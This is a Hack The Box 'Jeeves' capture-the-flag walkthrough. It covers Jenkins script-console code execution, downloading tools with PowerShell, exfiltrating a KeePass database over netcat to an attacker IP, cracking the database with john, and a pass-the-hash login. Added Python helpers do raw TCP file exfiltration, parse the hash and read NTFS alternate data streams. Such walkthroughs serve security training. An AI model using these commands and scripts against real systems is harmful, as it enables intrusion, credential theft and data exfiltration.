Hack the Box Jeeves
This was a fantastic Windows machine that involved deeper enumeration to identify a service running on the non-standard port 50000. With an unauthenticated connection we execute code from the provided script console to obtain a foothold as a user. Running winPEAS shows there is a KeePass database, and the privilege escalation exploit checker shows a Juicy Potato exploit.
Web app code execution
KeePass database cracking
Windows Data Exfiltration - (Sender) nc -nv 10.10.14.102 6363 < CEH.kdbx - (Listener) nc -nlvp 6363 > CEH.kdbx
Linux ---> Windows File Transfer - powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe', 'winPeas.exe') - With a Linux http.server
Pass the hash - sudo pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109 cmd.exe
Alternative data stream
Simple http server
As always we start off with a basic nmap scan, followed by version enumeration and the default nmap scripts. These are denoted by:
-sC - run the default NSE scripts
-sV - service and version detection
└─$ nmap 10.129.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 17:07 EDT
Nmap scan report for 10.129.1.109
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
50000/tcp open  ibm-db2
└─$ nmap -sC -sV 10.129.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 17:07 EDT
Nmap scan report for 10.129.1.109
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Port 80 - HTTP web server (Microsoft IIS 10.0)
Port 135 - MSRPC
Port 445 - SMB file sharing
Port 50000 - HTTP (Jetty 9.4.z-SNAPSHOT)
Enumeration Port 80
Port 80 is running Microsoft IIS httpd 10.0, which is recent enough that we are unlikely to find useful public CVEs. Furthermore, the website only returns errors and has no real content.
Enumeration Port 135
Using Impacket's rpcdump.py I scraped the service for information and found nothing particularly useful.
Enumeration Port 445
smbclient connections required authentication.
smbmap -H also required authentication.
Enumeration Port 50000
Port 50000 is looking like the most likely attack vector.
The default page returns an error and there is no obvious default directory, so the next step in the process is to check for hidden directories with dirbuster.
We see that /askjeeves/ is eventually found.
This landing page puts us in an authenticated session right off the bat and totally opens the door for exploitation. I know from experience that Jenkins and similar build automation servers, which show up on Hack The Box and in the OSCP PWK labs, can often be exploited by executing code on the platform through the native script console or build steps once you have authenticated access.
After poking around it was suggested that this app uses the Groovy language, so my next focus was "Groovy reverse shells". This turns up an immediate result on GitHub.
This part is simple enough: we copy and paste the code into the script console, entering our own listener IP and port.
Our listener gets the catch upon running the "Build executor" in the Jenkins application. This provides us with user-level privileges and we capture our first flag.
The first place to always start with privilege escalation is uploading winPEAS, a Windows enumeration script focused on finding privilege escalation opportunities.
This is done by spinning up a python3 http server.
We can download the file onto windows with the following command run on the target windows machine.
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/winPEAS.exe', 'winPeas.exe')
Referenced from here
Running winPEAS provides something obvious right at the end of the results screen as it relates to KeePass, a common password manager.
Some simple research on KeePass database vulnerabilities yields almost immediate results.
Acquiring the KeePass .kdbx file
From here we browse to the KeePass location winPEAS reported: C:\users\kohsuke\documents\CEH.kdbx.
The next step is to exfiltrate this file to my local machine. After an initial search for Windows binaries that would help with this, I decided to upload nc.exe. I used the link here for reference on the file transfer commands with nc.exe.
The command to download nc.exe onto the Windows machine, served from a python3 http.server:
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2:8000/nc.exe', 'nc.exe')
Netcat command on the target to upload CEH.kdbx to our listening machine:
nc -nv 10.10.14.102 6363 < CEH.kdbx
Netcat command on our machine to receive the upload:
nc -nlvp 6363 > CEH.kdbx
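The raw netcat transfer above gives no indication of whether the database arrived whole, and a truncated .kdbx will simply fail to crack. The following is an added example, not code from the original writeup: a netcat-style TCP file transfer with an integrity check. receive_file() is the listener side you could run on Kali in place of `nc -nlvp 6363 > CEH.kdbx`, send_file() mirrors `nc -nv HOST PORT < FILE` so the demo runs end to end on loopback, and both return a SHA-256 to compare against `certutil -hashfile CEH.kdbx SHA256` on the target. The sample file contents, the loopback host and the port choice are assumptions for the demo.

```python
"""Added example (not from the original writeup): netcat-style raw TCP file
transfer with a SHA-256 integrity check on both ends."""
import hashlib
import socket
import tempfile
import threading
from pathlib import Path

CHUNK = 65536


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def open_listener(bind_host: str, port: int) -> socket.socket:
    """Bind and listen like `nc -nlvp PORT`; port 0 picks a free port,
    readable afterwards via sock.getsockname()[1]."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_host, port))
    srv.listen(1)
    return srv


def receive_file(srv: socket.socket, dest: Path) -> str:
    """Accept one connection, write everything the peer sends to `dest`,
    close the listener and return the SHA-256 of what was written."""
    with srv:
        conn, _peer = srv.accept()
        with conn, dest.open("wb") as out:
            while True:
                chunk = conn.recv(CHUNK)
                if not chunk:      # EOF: nc closes once stdin (the file) is drained
                    break
                out.write(chunk)
    return sha256_of(dest)


def send_file(host: str, port: int, src: Path) -> str:
    """Mirror of `nc -nv HOST PORT < src`: stream the file, then half-close
    so the listener sees EOF.  Returns the source SHA-256."""
    with socket.create_connection((host, port)) as conn, src.open("rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            conn.sendall(chunk)
        conn.shutdown(socket.SHUT_WR)
    return sha256_of(src)


def exfil_and_verify(src: Path, dest: Path) -> dict:
    """Run listener and sender on loopback and report whether the hashes match."""
    srv = open_listener("127.0.0.1", 0)
    port = srv.getsockname()[1]
    result = {}
    worker = threading.Thread(target=lambda: result.update(received=receive_file(srv, dest)))
    worker.start()
    result["sent"] = send_file("127.0.0.1", port, src)
    worker.join(timeout=10)
    result["intact"] = result.get("received") == result["sent"]
    return result


def run_demo() -> dict:
    """Constructed stand-in for CEH.kdbx: the KeePass 2.x magic bytes plus filler."""
    tmp = Path(tempfile.mkdtemp())
    src = tmp / "CEH.kdbx"
    src.write_bytes(bytes.fromhex("03d9a29a67fb4bb5") + bytes(range(256)) * 512)
    return exfil_and_verify(src, tmp / "CEH.kdbx.received")


if __name__ == "__main__":
    r = run_demo()
    print(f"sent     {r['sent']}\nreceived {r['received']}\nintact:  {r['intact']}")
```

The half-close in send_file is what makes the listener side terminate cleanly; netcat does the same when its stdin hits EOF, which is why `-q` or a Ctrl-C is sometimes needed with netcat builds that do not.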
Crack the database
Using a blog I found online (https://tzusec.com/cracking-keepass-database/) we can work towards opening this file and pivoting to root.
Extract the hash
First we extract a crackable hash of the master password with John the Ripper's keepass2john helper.
└─$ keepass2john CEH.kdbx
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
└─$ keepass2john CEH.kdbx > hash.txt
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)
1g 0:00:00:23 DONE (2021-07-25 21:52) 0.04180g/s 2298p/s 2298c/s 2298C/s mwuah..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
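The three "Cost" lines john prints come straight out of the fields keepass2john packed into the hash line. As an added example, not part of the original writeup, here is a parser for that line so the fields are visible and the hash can be sanity-checked before committing CPU to a wordlist. The layout is john's KeePass 2.x (.kdbx) hash format: `$keepass$*<version>*<rounds>*<algorithm>*<master seed>*<transform seed>*<IV>*<expected start bytes>*<first encrypted block>`. SAMPLE_LINE is the hash shown above; the rockyou.txt line count used for the time estimate is an assumption.

```python
"""Added example (not from the original writeup): parse a keepass2john hash
line and estimate worst-case wordlist time from john's reported p/s rate."""
from dataclasses import dataclass

SAMPLE_LINE = (
    "CEH:$keepass$*2*6000*0"
    "*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d"
    "*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091"
    "*393c97beafd8a820db9142a6a94f03f6"
    "*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff"
    "*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48"
)

ALGORITHMS = {0: "AES", 1: "TwoFish", 2: "ChaCha"}   # john's "Cost 3" legend
ROCKYOU_LINES = 14_344_391                           # assumed size of the stock rockyou.txt


@dataclass(frozen=True)
class KeePassHash:
    label: str            # text before the first ':' (keepass2john uses the file stem)
    version: int          # 1 = legacy .kdb, 2 = .kdbx      (john's "Cost 2")
    rounds: int           # AES-KDF transform rounds        (john's "Cost 1")
    algorithm: int        # outer cipher id                 (john's "Cost 3")
    master_seed: bytes    # 32 bytes from the kdbx header
    transform_seed: bytes # 32-byte AES key used for the key transform rounds
    iv: bytes             # 16-byte CBC IV for the payload
    expected_start: bytes # 32 bytes the decrypted payload must begin with
    first_block: bytes    # first 32 bytes of ciphertext, enough to test a guess

    @property
    def algorithm_name(self) -> str:
        return ALGORITHMS.get(self.algorithm, f"unknown({self.algorithm})")


def parse_keepass2john(line: str) -> KeePassHash:
    """Split one keepass2john output line into typed fields, checking the
    lengths a kdbx 3.x header implies (32-byte seeds, 16-byte AES IV)."""
    line = line.strip()
    if line.startswith("$keepass$"):
        label, body = "", line
    else:
        label, sep, body = line.partition(":")
        if not sep or not body.startswith("$keepass$"):
            raise ValueError("not a keepass2john line")
    f = body.split("*")
    if len(f) != 9:
        raise ValueError(f"expected 9 '*'-separated fields, got {len(f)}")
    version, rounds, algorithm = int(f[1]), int(f[2]), int(f[3])
    if version != 2:
        raise ValueError("only KeePass 2.x (.kdbx) hashes are handled here")
    blobs = [bytes.fromhex(x) for x in f[4:9]]
    for got, want in zip(blobs, (32, 32, 16, 32, 32)):
        if len(got) != want:
            raise ValueError(f"field is {len(got)} bytes, expected {want}: hash truncated or mangled")
    return KeePassHash(label, version, rounds, algorithm, *blobs)


def seconds_to_exhaust(candidates: int, rate_per_second: float) -> float:
    """Worst-case wall time for a wordlist at the p/s figure john reports."""
    return candidates / rate_per_second


if __name__ == "__main__":
    h = parse_keepass2john(SAMPLE_LINE)
    print(f"{h.label}: kdbx v{h.version}, {h.algorithm_name}, {h.rounds} transform rounds")
    print(f"master seed {h.master_seed.hex()[:16]}..., IV {h.iv.hex()}")
    hours = seconds_to_exhaust(ROCKYOU_LINES, 2298) / 3600
    print(f"rockyou worst case at 2298 p/s: {hours:.1f} h")
```

Cost 1 is the number to look at before starting: 6000 transform rounds is why this run manages about 2300 candidates per second per thread and all of rockyou would take under two hours even in the worst case. A database with a far higher round count, or one that needs a key file as well as a password, changes that budget completely.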
Open the cracked DB
From here I installed keepass2 on my Kali Linux machine and opened the database with the cracked master password.
I tried all the passwords and stuffed them everywhere I could. But at the end of the day, the "Backup stuff" entry held what looked like an NTLM hash pair (LM:NT) with no username. So I proceeded to attempt to pass the hash, initially with Impacket, which kept erroring out, so I learned about a new tool, pth-winexe. This was successful with the "administrator" username prepended to the hash and separated from it by a % character; within the hash itself the colon separates the LM half from the NT half, and the LM value aad3b435b51404eeaad3b435b51404ee is the well-known hash of an empty string, meaning LM hashes are disabled and only the NT half matters. From here we captured the root flag.
sudo pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.129.1.109 cmd.exe
Wait a sec! That is not root!
The old "alternate data stream" trick. I learned about a variation of this back in high school.
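A plain `dir` or `Get-ChildItem` only shows a file's default data stream, so a flag tucked into a named stream is invisible until you ask for streams explicitly (`dir /R`, or `Get-Item -Stream *` in PowerShell). As an added example, not code from the original writeup, here is the same check in Python using the Win32 FindFirstStreamW/FindNextStreamW calls, followed by reading a named stream through the `file:stream` path syntax NTFS accepts. Windows reports each stream as `:<name>:$DATA`, with `::$DATA` for the ordinary file content, so anything with a non-empty name is what a directory listing hides. The demo path and stream name are assumptions; enumeration itself only works on Windows, while the name parsing is plain Python.

```python
"""Added example (not from the original writeup): list and read NTFS
alternate data streams via the Win32 stream enumeration API."""
import ctypes
import os
import sys
import tempfile

MAX_PATH = 260


class WIN32_FIND_STREAM_DATA(ctypes.Structure):
    _fields_ = [("StreamSize", ctypes.c_int64),
                ("cStreamName", ctypes.c_wchar * (MAX_PATH + 36))]


def parse_stream_name(raw: str) -> tuple:
    """':secret.txt:$DATA' -> ('secret.txt', '$DATA'); '::$DATA' -> ('', '$DATA')."""
    if not raw.startswith(":"):
        raise ValueError(f"unexpected stream name {raw!r}")
    name, _, kind = raw[1:].rpartition(":")
    return name, kind


def list_streams(path: str) -> list:
    """Return [(stream name, size)] for every stream on `path`; '' is the
    default $DATA stream.  Requires Windows and an NTFS volume."""
    if sys.platform != "win32":
        raise OSError("stream enumeration needs the Win32 API on NTFS")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.FindFirstStreamW.restype = ctypes.c_void_p
    k32.FindFirstStreamW.argtypes = [ctypes.c_wchar_p, ctypes.c_int, ctypes.c_void_p, ctypes.c_uint32]
    k32.FindNextStreamW.restype = ctypes.c_int
    k32.FindNextStreamW.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
    k32.FindClose.argtypes = [ctypes.c_void_p]
    invalid_handle = ctypes.c_void_p(-1).value
    data = WIN32_FIND_STREAM_DATA()
    handle = k32.FindFirstStreamW(path, 0, ctypes.byref(data), 0)   # 0 = FindStreamInfoStandard
    if handle in (None, invalid_handle):
        raise ctypes.WinError(ctypes.get_last_error())
    streams = []
    try:
        while True:
            name, _kind = parse_stream_name(data.cStreamName)
            streams.append((name, data.StreamSize))
            if not k32.FindNextStreamW(handle, ctypes.byref(data)):
                break   # ERROR_HANDLE_EOF once the last stream has been returned
    finally:
        k32.FindClose(handle)
    return streams


def hidden_streams(path: str) -> list:
    """Only the named streams, i.e. what `dir` on its own would not show."""
    return [(name, size) for name, size in list_streams(path) if name]


def read_stream(path: str, name: str) -> bytes:
    """NTFS accepts 'file:stream' as a path, so a normal open() reads an ADS."""
    with open(f"{path}:{name}", "rb") as f:
        return f.read()


if __name__ == "__main__":
    # Demo: create a file with a hidden stream (assumed name), then find and read it.
    path = os.path.join(tempfile.mkdtemp(), "notes.txt")
    with open(path, "w") as f:
        f.write("nothing to see here\n")
    with open(path + ":hidden.txt", "w") as f:      # only succeeds on NTFS
        f.write("constructed secret\n")
    for name, size in hidden_streams(path):
        print(f"{path}:{name} ({size} bytes) -> {read_stream(path, name)!r}")
```

Run recursively over a directory of interest (the Desktop of the account you just landed in, for instance) and anything with a non-empty stream name deserves a look; `more < file:stream` or `Get-Content -Stream` reads it just as open() does here.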